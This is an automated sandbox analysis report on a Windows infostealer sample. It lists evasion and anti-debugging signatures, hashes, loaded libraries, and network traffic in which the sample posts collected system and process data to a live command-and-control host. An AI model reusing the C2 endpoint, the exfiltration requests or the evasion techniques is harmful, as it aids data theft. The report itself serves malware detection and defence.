Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HrIrtCXI3s.exe

Overview

General Information

Sample name:HrIrtCXI3s.exe
renamed because original name is a hash value
Original sample name:629763eb39d91bb69848475c90ad1e63.exe
Analysis ID:1580954
MD5:629763eb39d91bb69848475c90ad1e63
SHA1:dc7b1a7b530dc7c8a22e50836ad747483b06bf3e
SHA256:b493e279c1d18ac53caeca4e865c658c25f256fda1be8a5d9ef33184e67497e0
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • HrIrtCXI3s.exe (PID: 2828 cmdline: "C:\Users\user\Desktop\HrIrtCXI3s.exe" MD5: 629763EB39D91BB69848475C90AD1E63)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: HrIrtCXI3s.exeAvira: detected
Source: HrIrtCXI3s.exeReversingLabs: Detection: 39%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: HrIrtCXI3s.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: -----BEGIN PUBLIC KEY-----0_2_004FDCF0
Source: HrIrtCXI3s.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: HrIrtCXI3s.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_004D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_004D255D
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_004D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004D29FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 503853Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 30 34 37 34 36 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_004D7770 recv,0_2_004D7770
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 503853Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 30 34 37 34 36 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Thu, 26 Dec 2024 13:14:28 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Thu, 26 Dec 2024 13:14:30 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: HrIrtCXI3s.exe, 00000000.00000002.2014039691.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: HrIrtCXI3s.exe, 00000000.00000002.2014039691.00000000018CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4
Source: HrIrtCXI3s.exe, 00000000.00000003.1973567239.0000000001903000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000002.2014121507.0000000001905000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1973782520.0000000001904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: HrIrtCXI3s.exe, 00000000.00000003.1973567239.0000000001903000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000002.2014121507.0000000001905000.00000004.00000020.00020000.00000000.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1973782520.0000000001904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0l-
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: HrIrtCXI3s.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: HrIrtCXI3s.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: HrIrtCXI3s.exe, HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: HrIrtCXI3s.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: HrIrtCXI3s.exe, 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, HrIrtCXI3s.exe, 00000000.00000003.1831021429.0000000007490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443

System Summary

barindex
Source: HrIrtCXI3s.exeStatic PE information: section name:
Source: HrIrtCXI3s.exeStatic PE information: section name: .idata
Source: HrIrtCXI3s.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0195735D0_3_0195735D
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_01976E600_3_01976E60
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_01976E600_3_01976E60
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_0195735D0_3_0195735D
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_01976E600_3_01976E60
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_3_01976E600_3_01976E60
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_0059B1800_2_0059B180
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_004E05B00_2_004E05B0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_004E6FA00_2_004E6FA0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_0085A0000_2_0085A000
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_004E10E60_2_004E10E6
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_005A00E00_2_005A00E0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_0085E0500_2_0085E050
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_005362100_2_00536210
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_0059C3200_2_0059C320
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_005A04200_2_005A0420
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_0083D4300_2_0083D430
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_008435B00_2_008435B0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_004DE6200_2_004DE620
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_008547800_2_00854780
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_008617A00_2_008617A0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_0059C7700_2_0059C770
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_008367300_2_00836730
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_005898800_2_00589880
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_004E49400_2_004E4940
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_004DA9600_2_004DA960
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_0058C9000_2_0058C900
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_008299200_2_00829920
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_006A6AC00_2_006A6AC0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_00853A700_2_00853A70
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_00841BD00_2_00841BD0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_00848BF00_2_00848BF0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_00511BE00_2_00511BE0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_004DCBB00_2_004DCBB0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_0085CC900_2_0085CC90
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_00837CC00_2_00837CC0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_0084CD800_2_0084CD80
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_00854D400_2_00854D40
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_00690D800_2_00690D80
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_004E5DB00_2_004E5DB0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_007EAE300_2_007EAE30
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_004E3ED00_2_004E3ED0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_004F5EB00_2_004F5EB0
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_00822F900_2_00822F90
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_004F4F700_2_004F4F70
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_0059EF900_2_0059EF90
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_00598F900_2_00598F90
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: String function: 004D75A0 appears 529 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: String function: 006ACBC0 appears 95 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: String function: 005150A0 appears 31 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: String function: 005B44A0 appears 72 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: String function: 004DCAA0 appears 41 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: String function: 004D71E0 appears 42 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: String function: 00514FD0 appears 200 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: String function: 00687220 appears 88 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: String function: 004ECD40 appears 40 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: String function: 00515340 appears 39 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: String function: 00514F40 appears 198 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: String function: 004ECCD0 appears 39 times
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: String function: 004D73F0 appears 86 times
Source: HrIrtCXI3s.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: HrIrtCXI3s.exeStatic PE information: Section: lqffkoae ZLIB complexity 0.9943955732122588
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_004D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_004D255D
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeCode function: 0_2_004D31D7 CreateToolhelp32Snapshot,CloseHandle,0_2_004D31D7
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: HrIrtCXI3s.exeReversingLabs: Detection: 39%
Source: HrIrtCXI3s.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: HrIrtCXI3s.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeSection loaded: napinsp.dllJump to behavior
